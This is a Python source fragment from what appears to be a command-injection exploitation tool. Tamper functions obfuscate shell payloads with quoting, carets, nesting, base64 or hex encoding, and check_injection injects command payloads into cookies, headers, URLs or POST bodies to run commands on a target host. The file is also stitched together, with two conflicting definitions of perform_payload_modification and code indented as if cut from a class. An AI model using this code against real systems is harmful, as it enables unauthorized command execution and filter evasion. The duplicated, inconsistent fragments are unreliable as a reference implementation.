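def perform_payload_modification(payload):
    """Apply the configured tamper scripts to *payload* and return the result.

    Script names are read from ``settings.MULTI_ENCODED_PAYLOAD`` and applied
    in reverse configuration order, each name at most once.  Two passes are
    made so that every text transformation (``singlequotes``, ``backslashes``,
    ``caret``, ``nested``) is applied before any encoding (``base64encode``,
    ``hexencode``).  Names that match neither group are ignored.

    Args:
        payload: The payload string to transform.

    Returns:
        The transformed (and possibly encoded) payload string.
    """
    # Deduplicate while keeping the reversed order stable.  The previous
    # ``list(set(...))`` dropped the order, so the composition of the tamper
    # scripts -- and therefore the output -- could change between interpreter
    # runs (string hashing is randomized per process).
    encode_types = []
    for encode_type in settings.MULTI_ENCODED_PAYLOAD[::-1]:
        if encode_type not in encode_types:
            encode_types.append(encode_type)

    # Pass 1: text transformations.  Imports are deferred so that only the
    # tamper modules actually requested get loaded.
    for encode_type in encode_types:
        # Wrap with single quotes.
        if encode_type == 'singlequotes':
            from src.core.tamper import singlequotes
            payload = singlequotes.transform(payload)
        # Insert backslashes.
        elif encode_type == 'backslashes':
            from src.core.tamper import backslashes
            payload = backslashes.transform(payload)
        # Insert caret symbols.
        elif encode_type == 'caret':
            from src.core.tamper import caret
            payload = caret.transform(payload)
        # Transformation to a nested command.
        elif encode_type == 'nested':
            from src.core.tamper import nested
            payload = nested.transform(payload)

    # Pass 2: encodings, applied on top of the transformed text.
    for encode_type in encode_types:
        # Encode payload to base64 format.
        if encode_type == 'base64encode':
            from src.core.tamper import base64encode
            payload = base64encode.encode(payload)
        # Encode payload to hex format.
        elif encode_type == 'hexencode':
            from src.core.tamper import hexencode
            payload = hexencode.encode(payload)

    return payload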
def perform_payload_encoding(payload):
    """Encode *payload* with the encoding tamper scripts that are enabled.

    Walks ``settings.MULTI_ENCODED_PAYLOAD`` from last entry to first and
    applies ``base64encode`` / ``hexencode`` wherever the name occurs, so a
    name listed twice encodes the payload twice.  Every other name is skipped.

    Args:
        payload: The payload string to encode.

    Returns:
        The payload after all matching encodings have been applied.
    """
    for tamper_name in reversed(settings.MULTI_ENCODED_PAYLOAD):
        # Modules are imported lazily so that only the requested one is loaded.
        if tamper_name == 'base64encode':
            # Encode payload to base64 format.
            from src.core.tamper import base64encode
            payload = base64encode.encode(payload)
        elif tamper_name == 'hexencode':
            # Encode payload to hex format.
            from src.core.tamper import hexencode
            payload = hexencode.encode(payload)
    return payload
def perform_payload_modification(payload):
    """Apply the enabled tamper scripts to *payload*, text changes first.

    ``settings.MULTI_ENCODED_PAYLOAD`` is walked from last entry to first,
    twice: the first pass applies ``singlequotes``, the second pass applies
    ``base64encode`` and ``hexencode``.  A name that appears several times is
    applied that many times; unrecognised names are skipped.

    Args:
        payload: The payload string to modify.

    Returns:
        The transformed and, where requested, encoded payload.
    """
    tamper_names = settings.MULTI_ENCODED_PAYLOAD[::-1]

    # First pass: text transformation only.
    for tamper_name in tamper_names:
        if tamper_name == 'singlequotes':
            # Wrap with single quotes.
            from src.core.tamper import singlequotes
            payload = singlequotes.transform(payload)

    # Second pass: encodings, applied after the text transformation.
    for tamper_name in tamper_names:
        if tamper_name == 'base64encode':
            # Encode payload to base64 format.
            from src.core.tamper import base64encode
            payload = base64encode.encode(payload)
        elif tamper_name == 'hexencode':
            # Encode payload to hex format.
            from src.core.tamper import hexencode
            payload = hexencode.encode(payload)

    return payload
    def check_injection(separator, payload, TAG, cmd, prefix, suffix,
                        whitespace, http_request_method, url, vuln_parameter,
                        OUTPUT_TEXTFILE, alter_shell, filename):
        """Build the file-based command payload, send one request, return the response.

        The incoming ``payload`` argument is discarded: it is overwritten by the
        payload generated from ``separator``, ``cmd`` and ``OUTPUT_TEXTFILE``.
        ``TAG`` and ``filename`` are accepted but never read in this body.
        The returned ``response`` comes from whichever ``*_injection_test``
        helper or ``requests.get_request_response`` call is selected below.

        NOTE(review): ``urllib2`` / ``urllib.unquote`` are Python 2 names, so
        this code targets Python 2.  ``requests`` here exposes
        ``get_request_response``, which the PyPI package does not, so it is
        presumably a project module -- confirm against the imports.
        """

        # Execute shell commands on vulnerable host.
        # Either branch replaces the caller-supplied ``payload`` entirely.
        if alter_shell:
            payload = fb_payloads.cmd_execution_alter_shell(
                separator, cmd, OUTPUT_TEXTFILE)
        else:
            payload = fb_payloads.cmd_execution(separator, cmd,
                                                OUTPUT_TEXTFILE)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Whitespace fixation
        # NOTE(review): ``whitespace`` is passed as an re replacement template,
        # so backslash sequences in it are interpreted by re.sub, not copied.
        payload = re.sub(" ", whitespace, payload)

        # Encode payload to base64 format.
        # Because of the ``elif``, at most one encoding is applied: base64
        # takes precedence when both tamper scripts are enabled.
        if settings.TAMPER_SCRIPTS['base64encode']:
            from src.core.tamper import base64encode
            payload = base64encode.encode(payload)

        # Encode payload to hex format.
        elif settings.TAMPER_SCRIPTS['hexencode']:
            from src.core.tamper import hexencode
            payload = hexencode.encode(payload)

        # Check if defined "--verbose" option.
        # NOTE(review): this block is not purely diagnostic -- when
        # ``settings.COMMENT`` occurs in the payload it also truncates
        # ``payload`` itself, so the request sent differs between verbose and
        # non-verbose runs.  Confirm whether that truncation is intended to
        # apply regardless of verbosity.
        if settings.VERBOSITY_LEVEL >= 1:
            payload_msg = payload.replace("\n", "\\n")
            if settings.COMMENT in payload_msg:
                payload = payload.split(settings.COMMENT)[0].strip()
                payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
            info_msg = "Executing the '" + cmd.split(
                settings.COMMENT)[0].strip() + "' command... "
            sys.stdout.write(settings.print_info_msg(info_msg))
            sys.stdout.flush()
            output_payload = "\n" + settings.print_payload(payload)
            # This inner check is always true here: the enclosing ``if``
            # already required VERBOSITY_LEVEL >= 1.
            if settings.VERBOSITY_LEVEL >= 1:
                output_payload = output_payload + "\n"
            sys.stdout.write(output_payload)

        # Injection point selection: the first matching location wins, in the
        # order cookie, user-agent, referer, custom header, then the request
        # line / body.

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            response = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            response = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            response = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
            response = custom_header_injection_test(url, vuln_parameter,
                                                    payload)

        else:
            # Check if defined method is GET (Default).
            if http_request_method == "GET":
                # Check if its not specified the 'INJECT_HERE' tag
                #url = parameters.do_GET_check(url)
                payload = payload.replace(" ", "%20")
                # ``settings.INJECT_TAG`` is used as a regex pattern and
                # ``payload`` as a replacement template, so regex
                # metacharacters / backslashes in either are not taken literally.
                target = re.sub(settings.INJECT_TAG, payload, url)
                # The joined value is not used again in this branch.
                vuln_parameter = ''.join(vuln_parameter)
                request = urllib2.Request(target)
                # Check if defined extra headers.
                headers.do_check(request)
                # Get the response of the request
                response = requests.get_request_response(request)

            else:
                # Check if defined method is POST.
                parameter = menu.options.data
                parameter = urllib2.unquote(parameter)
                # Check if its not specified the 'INJECT_HERE' tag
                parameter = parameters.do_POST_check(parameter)
                # Define the POST data
                if settings.IS_JSON:
                    payload = payload.replace("\"", "\\\"")
                    data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
                                  parameter)
                    # NOTE(review): the bare ``except`` swallows every
                    # exception (including KeyboardInterrupt).  When the
                    # substituted text is not valid JSON, ``data`` stays a
                    # plain string and json.dumps() below emits it as a single
                    # quoted JSON string rather than the intended object.
                    try:
                        data = json.loads(data, strict=False)
                    except:
                        pass
                    request = urllib2.Request(url, json.dumps(data))
                else:
                    if settings.IS_XML:
                        data = re.sub(settings.INJECT_TAG,
                                      urllib.unquote(payload), parameter)
                    else:
                        data = re.sub(settings.INJECT_TAG, payload, parameter)
                    request = urllib2.Request(url, data)

                # Check if defined extra headers.
                headers.do_check(request)

                # Get the response of the request
                response = requests.get_request_response(request)
        return response